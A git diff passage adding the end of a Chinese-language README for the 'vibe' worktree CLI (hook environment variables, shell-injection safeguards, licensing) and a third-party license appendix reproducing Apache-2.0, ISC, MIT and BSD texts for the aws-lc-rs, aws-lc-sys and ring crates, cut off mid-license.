+### 环境变量
+
+以下环境变量在所有钩子命令中均可使用：
+
+| 变量                 | 说明                       |
+| -------------------- | -------------------------- |
+| `VIBE_WORKTREE_PATH` | 所创建 worktree 的绝对路径 |
+| `VIBE_ORIGIN_PATH`   | 原始仓库的绝对路径         |
+
+## 安全性
+
+Vibe 遵循 CLI 工具的安全最佳实践：
+
+- **防止 shell 注入**：为 shell 包装函数 `eval` 而输出的 `cd` 行会经过单引号转义（`rust/crates/vibe-core/src/shell.rs`），以防止通过精心构造的目录名进行命令注入。完整协议请参见 [The stdout Eval Contract](docs/specifications/eval-contract.zh.md)
+- **不执行 shell 字符串**：子进程通过 `std::process::Command` 以参数数组的方式启动，绝不使用 shell 字符串，因此参数不会被 shell 解释
+- **配置信任机制**：对 `.vibe.toml` 与 `.vibe.local.toml` 文件进行 SHA-256 哈希校验
+- **路径校验**：所有用户提供的路径在使用前都会经过校验
+
+完整的安全检查清单请参见 [docs/SECURITY_CHECKLIST.zh.md](docs/SECURITY_CHECKLIST.zh.md)。
+
+## 参与贡献
+
+关于开发环境搭建与贡献指南，请参见 [CONTRIBUTING.md](CONTRIBUTING.md)。
+
+## 许可证
+
+MIT —— 请参见 [LICENSE](./LICENSE)。
+
+截至 v2.x（含）的发行版本以 Apache-2.0 许可发布。
+MIT 许可证自 v3.0.0 起适用（参见 [#553](https://github.com/kexi/vibe/issues/553)）。

--- a/THIRD-PARTY-LICENSES.md
+++ b/THIRD-PARTY-LICENSES.md
@@ -3,8 +3,12 @@
 The `vibe` binary is written in Rust and statically links the crates listed
 below. Each is distributed under a permissive license (MIT, Apache-2.0, ISC,
 BSD-3-Clause, Zlib, Unlicense, CC0-1.0, Unicode-3.0, CDLA-Permissive-2.0, or a
-dual/multi-license `OR` of these). Where a crate is multi-licensed, vibe's
-distribution elects the permissive option.
+dual/multi-license `OR` of these). Where a crate is multi-licensed with `OR`,
+vibe's distribution elects the permissive option.
+
+Some crates are licensed under a top-level `AND` conjunction instead. Those
+obligations cannot be elected away, so the license and notice files those
+crates ship are reproduced in full in the appendix at the end of this file.
 
 This list is generated from `cargo metadata` over `rust/Cargo.lock` by
 `scripts/generate-third-party-licenses.ts`. It is the full dependency graph,
@@ -185,3 +189,1115 @@ every shipped binary; listing them all is intentionally conservative.
 | wit-parser | 0.244.0 | Apache-2.0 WITH LLVM-exception OR Apache-2.0 OR MIT |
 | zeroize | 1.8.2 | Apache-2.0 OR MIT |
 | zmij | 1.0.21 | MIT |
+
+## Appendix: License texts and notices for non-electable obligations
+
+Most crates above are offered under an `OR` choice, and vibe's distribution
+elects the permissive arm. The crates in this appendix are different: their
+SPDX expression is a top-level `AND` conjunction, so every conjunct binds and
+no election can shed it. Their obligations therefore travel with the shipped
+binary, and the license and notice files each crate distributes are reproduced
+below verbatim, exactly as published on crates.io.
+
+Like the table above, this appendix is drawn from the conservative full
+dependency graph, so it may reproduce notices for crates that are not linked
+into any shipped binary. Reproducing a notice is not a representation that the
+crate is present in a given build.
+
+### aws-lc-rs 1.17.0 — ISC AND (Apache-2.0 OR ISC)
+
+#### LICENSE
+
+```
+SPDX-License-Identifier: ISC AND (Apache-2.0 OR ISC)
+
+
+Apache 2.0 license
+-------------------------------------
+
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+
+ISC license
+-------------------------------------
+
+
+Copyright Amazon.com, Inc. or its affiliates.
+
+Permission to use, copy, modify, and/or distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+```
+
+### aws-lc-sys 0.41.0 — ISC AND (Apache-2.0 OR ISC) AND Apache-2.0 AND MIT AND BSD-3-Clause AND (Apache-2.0 OR ISC OR MIT) AND (Apache-2.0 OR ISC OR MIT-0)
+
+#### LICENSE
+
+````
+AWS Libcrypto (AWS-LC)
+
+AWS-LC is a fork of BoringSSL, which is itself a fork of OpenSSL.
+Content from these and other sources retains their original licensing,
+as described below. New files from AWS-LC are made available under the Apache-2.0 license OR the ISC
+license. These licenses are reproduced at the bottom of this file.
+
+```
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0 OR ISC
+```
+
+
+================================================================================
+BoringSSL
+================================================================================
+
+BoringSSL is a Google-maintained fork of OpenSSL. Historically, code
+authored by Google for BoringSSL was licensed under the ISC License.
+BoringSSL has since relicensed upstream to Apache License 2.0. Existing
+AWS-LC code originating from BoringSSL retains its ISC license, while
+newer code taken from BoringSSL is licensed under Apache License 2.0.
+
+```
+Copyright (c) 2014-2024 Google Inc.
+SPDX-License-Identifier: ISC
+```
+
+Additional individual contributions to BoringSSL-derived code are
+covered under the ISC license:
+
+  - Brian Smith (Copyright 2016)
+  - Robert Nagy (Copyright 2022)
+  - Arm Ltd (Copyright 2020)
+
+```
+Copyright (c) 2025-2026 Google Inc.
+SPDX-License-Identifier: Apache-2.0
+```
+
+================================================================================
+OpenSSL
+================================================================================
+
+Code derived from the OpenSSL project is licensed under the
+Apache License, Version 2.0.
+
+```
+Copyright (c) 1998-2011 The OpenSSL Project. All rights reserved.
+SPDX-License-Identifier: Apache-2.0
+```
+
+Some OpenSSL-derived files also carry the original SSLeay copyright:
+
+```
+Copyright (c) 1995-1998 Eric Young (eay@cryptsoft.com). All rights reserved.
+SPDX-License-Identifier: Apache-2.0
+```
+
+Portions of OpenSSL-derived code include contributions from:
+
+  - Sun Microsystems, Inc. (Copyright 2002)
+  - Nokia (Copyright 2005)
+  - Intel Corporation (Copyright 2012-2021)
+
+These contributions are covered under the Apache-2.0 license.
+
+================================================================================
+mlkem-native
+================================================================================
+
+Code from the mlkem-native project is licensed under Apache License 2.0 or MIT or ISC.
+
+```
+Copyright (c) The mlkem-native project authors.
+SPDX-License-Identifier: Apache-2.0 OR ISC OR MIT
+```
+
+================================================================================
+mldsa-native
+================================================================================
+
+Code from the mldsa-native project is licensed under Apache License 2.0 or MIT or ISC
+
+```
+Copyright (c) The mldsa-native project authors.
+SPDX-License-Identifier: Apache-2.0 OR ISC OR MIT
+```
+
+================================================================================
+Third-Party Libraries (compiled into libcrypto/libssl)
+================================================================================
+
+Fiat Cryptography
+-----------------
+Synthesizing Correct-by-Construction Code for Cryptographic Primitives.
+See third_party/fiat/LICENSE.
+
+```
+Copyright (c) 2015-2020 the fiat-crypto authors.
+SPDX-License-Identifier: MIT
+```
+
+s2n-bignum
+----------
+Integer arithmetic routines for cryptography.
+See third_party/s2n-bignum/s2n-bignum-imported/LICENSE.
+
+```
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+SPDX-License-Identifier: Apache-2.0 OR ISC OR MIT-0
+```
+
+Note: ML-KEM/SHA3 code within s2n-bignum is licensed as
+Apache-2.0 OR ISC OR MIT (with attribution), sourced from the
+mlkem-native project.
+
+Jitter Entropy RNG
+-------------------
+CPU Jitter Random Number Generator Library.
+See third_party/jitterentropy/jitterentropy-library/LICENSE.
+
+The Jitter Entropy library is dual-licensed under a BSD-style license
+and the GNU General Public License Version 2. Amazon expressly elects
+to distribute the package under the 3-Clause BSD License and NOT under
+GNU General Public License Version 2.
+
+```
+Copyright (C) 2017 - 2025, Stephan Mueller <smueller@chronox.de>.
+SPDX-License-Identifier: BSD-3-Clause
+```
+
+Keccak / AES Reference Implementations
+---------------------------------------
+Public domain (CC0) contributions.
+https://creativecommons.org/public-domain/cc0
+
+Code from sources and by authors listed in comments on top of the respective files.
+
+
+================================================================================
+Third-Party Libraries (NOT compiled into libcrypto/libssl)
+================================================================================
+
+The following are used for testing and build tooling only. Distributing
+code linked against AWS-LC (libcrypto/libssl) does NOT trigger these
+license obligations.
+
+Google Test
+-----------
+See third_party/googletest/LICENSE.
+
+```
+Copyright 2008 Google Inc.
+SPDX-License-Identifier: BSD-3-Clause
+```
+
+Go Standard Library
+-------------------
+Code in ssl/test/runner/ is derived from the Go standard library.
+
+```
+Copyright (c) The Go Authors. All rights reserved.
+SPDX-License-Identifier: BSD-3-Clause
+```
+
+Wycheproof Test Vectors
+------------------------
+Project Wycheproof is a community managed repository of test vectors that can be used by cryptography library
+developers to test against known attacks, specification inconsistencies, and other various implementation bugs.
+
+See third_party/wycheproof_testvectors/LICENSE.
+
+```
+SPDX-License-Identifier: Apache-2.0
+```
+
+
+================================================================================
+Full License Texts
+================================================================================
+
+Apache License 2.0
+------------------
+Apache License
+Version 2.0, January 2004
+http://www.apache.org/licenses/
+
+TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+    1. Definitions.
+
+        "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+        "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+        "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+        "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+        "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+        "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+        "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+        "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+        "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+        "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+    2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+    3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+    4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+        (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+        (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+        (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+        (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+    You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+    5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+    6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+    7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+    8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+    9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.
+
+END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+
+ISC License
+-----------
+Permission to use, copy, modify, and/or distribute this software for
+any purpose with or without fee is hereby granted, provided that the
+above copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL
+WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
+AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
+DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
+PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
+TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+PERFORMANCE OF THIS SOFTWARE.
+
+MIT License
+-----------
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
+CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
+TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
+SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+BSD 3-Clause License
+--------------------
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+1. Redistributions of source code must retain the above copyright
+   notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in the
+   documentation and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+   contributors may be used to endorse or promote products derived
+   from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+MIT No Attribution (MIT-0)
+--------------------------
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+````
+
+### ring 0.17.14 — Apache-2.0 AND ISC
+
+#### LICENSE
+
+```
+*ring* uses an "ISC" license, like BoringSSL used to use, for new code
+files. See LICENSE-other-bits for the text of that license.
+
+See LICENSE-BoringSSL for code that was sourced from BoringSSL under the
+Apache 2.0 license. Some code that was sourced from BoringSSL under the ISC
+license. In each case, the license info is at the top of the file.
+
+See src/polyfill/once_cell/LICENSE-APACHE and src/polyfill/once_cell/LICENSE-MIT
+for the license to code that was sourced from the once_cell project.
+```
+
+#### LICENSE-BoringSSL
+
+```
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
